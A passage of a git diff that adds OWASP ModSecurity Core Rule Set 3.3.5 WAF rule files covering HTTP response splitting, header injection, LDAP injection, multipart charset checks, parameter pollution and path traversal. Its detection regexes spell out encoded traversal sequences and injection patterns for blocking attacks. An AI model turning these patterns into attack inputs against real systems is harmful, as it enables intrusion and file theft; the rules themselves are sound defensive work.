+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272/220/34',\
+ ctl:auditLogParts=+E,\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\bhttp/\d|<(?:html|meta)\b)" \
+ "id:921130,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\
+ msg:'HTTP Response Splitting Attack',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272/220/34',\
+ ctl:auditLogParts=+E,\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+#
+# -=[ HTTP Header Injection ]=-
+#
+# [ Rule Logic ]
+# These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters,
+# on their own or in combination with header field names.
+# These characters may cause problems if the data is returned in a response header
+# and interpreted by the client.
+# The rules are similar to rules defending against the HTTP Request Splitting and
+# Request Smuggling rules.
+#
+# [ References ]
+# https://en.wikipedia.org/wiki/HTTP_header_injection
+#
+SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \
+ "id:921140,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:htmlEntityDecode,\
+ msg:'HTTP Header Injection Attack via headers',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272/220/273',\
+ ctl:auditLogParts=+E,\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+# Detect newlines in argument names.
+# Checking for GET arguments has been moved to paranoia level 2 (921151)
+# in order to mitigate possible false positives.
+#
+# This rule is also triggered by the following exploit(s):
+# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ]
+#
+SecRule ARGS_NAMES "@rx [\n\r]" \
+ "id:921150,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:urlDecodeUni,t:htmlEntityDecode,\
+ msg:'HTTP Header Injection Attack via payload (CR/LF detected)',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272/220/33',\
+ ctl:auditLogParts=+E,\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cookie|(?:x-)?(?:forwarded-(?:for|host|server)|host|via|remote-ip|remote-addr|originating-IP))\s*:" \
+ "id:921160,\
+ phase:1,\
+ block,\
+ capture,\
+ t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\
+ msg:'HTTP Header Injection Attack via payload (CR/LF and header-name detected)',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272/220/33',\
+ ctl:auditLogParts=+E,\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+# -=[ HTTP Splitting ]=-
+#
+# This rule detect \n or \r in the REQUEST FILENAME
+# Reference: https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016)
+#
+SecRule REQUEST_FILENAME "@rx [\n\r]" \
+ "id:921190,\
+ phase:1,\
+ block,\
+ t:none,t:urlDecodeUni,\
+ msg:'HTTP Splitting (CR/LF in request filename detected)',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272/220/34',\
+ ctl:auditLogParts=+E,\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+#
+# -=[ LDAP Injection ]=-
+#
+# [ Rule Logic ]
+#
+# This is a rule trying to prevent LDAP injection. It is based on a BlackHat presentation by Alonso Parada
+# and regex writing by Denis Kolegov.
+#
+# [ References ]
+# * https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf
+# * https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/
+# * https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/276#issue-126581660
+
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^[^:\(\)\&\|\!\<\>\~]*\)\s*(?:\((?:[^,\(\)\=\&\|\!\<\>\~]+[><~]?=|\s*[&!|]\s*(?:\)|\()?\s*)|\)\s*\(\s*[\&\|\!]\s*|[&!|]\s*\([^\(\)\=\&\|\!\<\>\~]+[><~]?=[^:\(\)\&\|\!\<\>\~]*)" \
+ "id:921200,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:htmlEntityDecode,\
+ msg:'LDAP Injection Attack',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-ldap',\
+ tag:'platform-multi',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/136',\
+ ctl:auditLogParts=+E,\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+#
+# -=[ Body Processor Bypass ]=-
+#
+# [ Rule Logic ]
+#
+# This rule intends to detect content types in the Content-Type header outside of the actual content type declaration.
+# This prevents bypasses targeting the Modsecurity recommended rules controlling which body processor is used.
+#
+# Regular expression generated from util/regexp-assemble/data/921421.data.
+# To update the regular expression run the following shell script
+# (consult util/regexp-assemble/README.md for details):
+# util/regexp-assemble/regexp-assemble.py update 921421
+#
+SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s,]+[;\s,].*?(?:(?:application(?:\/soap\+|\/)|text\/)xml|application\/(?:.+[+])?json)" \
+ "id:921421,\
+ phase:1,\
+ block,\
+ capture,\
+ t:none,t:lowercase,\
+ msg:'Content-Type header: Dangerous content type outside the mime type declaration',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153',\
+ tag:'PCI/12.1',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+#
+# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
+#
+
+
+# Detect newlines in GET argument values.
+# These may point to a HTTP header injection attack, but can also sometimes
+# occur in benign query parameters.
+#
+# See also: rule 921140, 921150
+#
+SecRule ARGS_GET "@rx [\n\r]" \
+ "id:921151,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:urlDecodeUni,t:htmlEntityDecode,\
+ msg:'HTTP Header Injection Attack via payload (CR/LF detected)',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272/220/33',\
+ ctl:auditLogParts=+E,\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+#
+# -=[ Body Processor Bypass ]=-
+#
+# [ Rule Logic ]
+#
+# This rule intends to detect content types in the Content-Type header outside of the actual content type declaration.
+#
+# [ References ]
+# * See rule 921422
+#
+# Regular expression generated from util/regexp-assemble/data/921422.data.
+# To update the regular expression run the following shell script
+# (consult util/regexp-assemble/README.md for details):
+# util/regexp-assemble/regexp-assemble.py update 921422
+#
+SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s,]+[;\s,].*?\b(?:(audio|image|video|csv|css|vnd|pdf|plain|json|soap|xml|x-www-form-urlencoded|form-data|related|x-amf|octet|stream|csp|report)|(text|multipart|application)|(\/|\+))\b" \
+ "id:921422,\
+ phase:1,\
+ block,\
+ capture,\
+ t:none,t:lowercase,\
+ msg:'Content-Type header: Dangerous content type outside the mime type declaration',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153',\
+ tag:'PCI/12.1',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+#
+# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
+#
+#
+
+# Forbid Request Range Header
+#
+# It is possible abuse the HTTP Request Range Header to leak error pages
+# and other information in very small snippets.
+# The easiest way to fight this is to deny the use of this header.
+# This is a viable option since the header is only used in rare circumstances
+# anymore.
+# If it is necessary to use it in a certain setup, then it is best to
+# create a rule exclusion for a given URI and this rule ID as a workaround.
+#
+SecRule &REQUEST_HEADERS:Range "@gt 0" \
+ "id:921230,\
+ phase:1,\
+ block,\
+ t:none,\
+ msg:'HTTP Range Header detected',\
+ logdata:'Matched Data: Header %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/3',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272/220',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
+
+
+# -=[ HTTP Parameter Pollution ]=-
+#
+# [ Rule Logic ]
+# These rules look for multiple parameters with the same name.
+# 921170 counts the occurrences of the individual parameters.
+# 921180 checks if any counter is > 1.
+#
+# One HPP attack vector is to try evade signature filters by distributing the
+# attack payload across multiple parameters with the same name.
+# This works as many security devices only apply signatures to individual
+# parameter payloads, however the back-end web application may (in the case
+# of ASP.NET) consolidate all of the payloads into one thus making the
+# attack payload active.
+#
+# [ References ]
+# http://tacticalwebappsec.blogspot.com/2009/05/http-parameter-pollution.html
+# https://capec.mitre.org/data/definitions/460.html
+#
+SecRule ARGS_NAMES "@rx ."
\
+ "id:921170,\
+ phase:2,\
+ pass,\
+ nolog,\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/137/15/460',\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'TX.paramcounter_%{MATCHED_VAR_NAME}=+1'"
+
+SecRule TX:/paramcounter_.*/ "@gt 1" \
+ "id:921180,\
+ phase:2,\
+ pass,\
+ msg:'HTTP Parameter Pollution (%{TX.1})',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/137/15/460',\
+ tag:'paranoia-level/3',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ chain"
+ SecRule MATCHED_VARS_NAMES "@rx TX:paramcounter_(.*)" \
+ "capture,\
+ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
+
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+#
+# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
+#
+
+
+
+#
+# -= Paranoia Levels Finished =-
+#
+SecMarker "END-REQUEST-921-PROTOCOL-ATTACK"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-922-MULTIPART-ATTACK.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-922-MULTIPART-ATTACK.conf
new file mode 100644
index 000000000..13847061d
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-922-MULTIPART-ATTACK.conf
@@ -0,0 +1,92 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.5
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# -= Paranoia Level 0 (empty) =- (apply unconditionally)
+#
+
+# This file is to address the 3UWMWA6W vulnerability.
+# It requires ModSecurity version 2.9.6 or 3.0.8 (or an updated version with backports
+# of the security fixes in these versions) or a compatible engine supporting these changes.
+#
+# If you cannot upgrade ModSecurity, this file will cause ModSecurity to fail to start.
+# In that case, you can temporarily delete this file. However, you will be missing
+# protection from these rules. Therefore, we recommend upgrading your engine instead.
+
+# The rules in this file will be part of the 920 / 921 in the future.
+
+# Only allow specific charsets when using "_charset_"
+# Note: this is in phase:2 because these are headers that come in the body
+SecRule &MULTIPART_PART_HEADERS:_charset_ "!@eq 0" \
+ "id:922100,\
+ phase:2,\
+ block,\
+ t:none,\
+ msg:'Multipart content type global _charset_ definition is not allowed by policy',\
+ logdata:'Matched Data: %{ARGS._charset_}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-multipart-header',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153',\
+ tag:'paranoia-level/1',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ chain"
+ SecRule ARGS:_charset_ "!@within |%{tx.allowed_request_content_type_charset}|" \
+ "t:lowercase,\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+# Only allow specific charsets same as Rule 920600
+# Note: this is in phase:2 because these are headers that come in the body
+SecRule MULTIPART_PART_HEADERS "@rx ^content-type\s*+:\s*+(.*)$" \
+ "id:922110,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:lowercase,\
+ msg:'Illegal MIME Multipart Header content-type: charset parameter',\
+ logdata:'Matched Data: %{TX.1} found within Content-Type multipart form',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'OWASP_CRS',\
+ tag:'capec/272/220',\
+ tag:'paranoia-level/1',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ chain"
+ SecRule TX:1 "!@rx
^(?:(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+)\/(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+))(?:\s*+;\s*+(?:(?:charset\s*+=\s*+(?:\"?(?:iso-8859-15?|windows-1252|utf-8)\b\"?))|(?:(?:c(?:h(?:a(?:r(?:s(?:e[^t\"(),\/:;<=>?![\x5c\]{}]|[^e\"(),/:;<=>?![\x5c\]{}])|[^s\"(),/:;<=>?![\x5c\]{}])|[^r\"(),/:;<=>?![\x5c\]{}])|[^a\"(),/:;<=>?![\x5c\]{}])|[^h\"(),/:;<=>?![\x5c\]{}])|[^c\"(),/:;<=>?![\x5c\]{}])[^\"(),/:;<=>?![\x5c\]{}]*(?:)\s*+=\s*+[^(),/:;<=>?![\x5c\]{}]+)|;?))*(?:\s*+,\s*+(?:(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+)\/(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+))(?:\s*+;\s*+(?:(?:charset\s*+=\s*+(?:\"?(?:iso-8859-15?|windows-1252|utf-8)\b\"?))|(?:(?:c(?:h(?:a(?:r(?:s(?:e[^t\"(),\/:;<=>?![\x5c\]{}]|[^e\"(),/:;<=>?![\x5c\]{}])|[^s\"(),/:;<=>?![\x5c\]{}])|[^r\"(),/:;<=>?![\x5c\]{}])|[^a\"(),/:;<=>?![\x5c\]{}])|[^h\"(),/:;<=>?![\x5c\]{}])|[^c\"(),/:;<=>?![\x5c\]{}])[^\"(),/:;<=>?![\x5c\]{}]*(?:)\s*+=\s*+[^(),/:;<=>?![\x5c\]{}]+)|;?))*)*$" \
+ "t:lowercase,\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+# Content-Transfer-Encoding was deprecated by rfc7578 in 2015 and should not be used (see: https://www.rfc-editor.org/rfc/rfc7578#section-4.7)
+# Note: this is in phase:2 because these are headers that come in the body
+SecRule MULTIPART_PART_HEADERS "@rx content-transfer-encoding:(.*)" \
+ "id:922120,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:lowercase,\
+ msg:'Content-Transfer-Encoding was deprecated by rfc7578 in 2015 and should not be used',\
+ logdata:'Matched Data: %{TX.0}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-deprecated-header',\
+ tag:'OWASP_CRS',\
+ tag:'capec/272/220',\
+ tag:'paranoia-level/1',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
new file mode 100644
index 000000000..986657ce9
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
@@ -0,0 +1,156 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.5
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# -= Paranoia Level 0 (empty) =- (apply unconditionally)
+#
+
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+#
+# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
+#
+
+#
+# -=[ Directory Traversal Attacks ]=-
+#
+# Ref: https://github.com/wireghoul/dotdotpwn
+#
+# [ Encoded /../ Payloads ]
+#
+SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@rx (?i)(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8|e)0%80%ae|2(?:(?:5(?:c0%25a|2))?e|%45)|u(?:(?:002|ff0)e|2024)|%32(?:%(?:%6|4)5|E)|c0(?:%[256aef]e|\.))|\.(?:%0[01]|\?)?|\?\.?|0x2e){2}(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))" \
+ "id:930100,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,\
+ msg:'Path Traversal Attack (/../)',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-lfi',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153/126',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'"
+
+#
+# [ Decoded /../ Payloads ]
+#
+SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@rx (?:^|[\\/])\.\.(?:[\\/]|$)" \
+ "id:930110,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdLine,\
+ msg:'Path Traversal Attack (/../)',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-lfi',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153/126',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ multiMatch,\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'"
+
+#
+# -=[ OS File Access ]=-
+#
+# Ref: https://github.com/lightos/Panoptic/blob/master/cases.xml
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile lfi-os-files.data" \
+ "id:930120,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,\
+ msg:'OS File Access Attempt',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-lfi',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153/126',\
+ tag:'PCI/6.5.4',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+#
+# -=[ Restricted File Access ]=-
+#
+# Detects attempts to retrieve application source
code, metadata,
+# credentials and version control history possibly reachable in a web root.
+#
+SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \
+ "id:930130,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,\
+ msg:'Restricted File Access Attempt',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-lfi',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153/126',\
+ tag:'PCI/6.5.4',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+#
+# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
+#
+
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+#
+# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
+#
+
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+#
+# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
+#
+
+
+
+#
+# -= Paranoia Levels Finished =-
+#
+SecMarker "END-REQUEST-930-APPLICATION-ATTACK-LFI"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf
new file mode 100644
index 000000000..888c8e4c3
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf
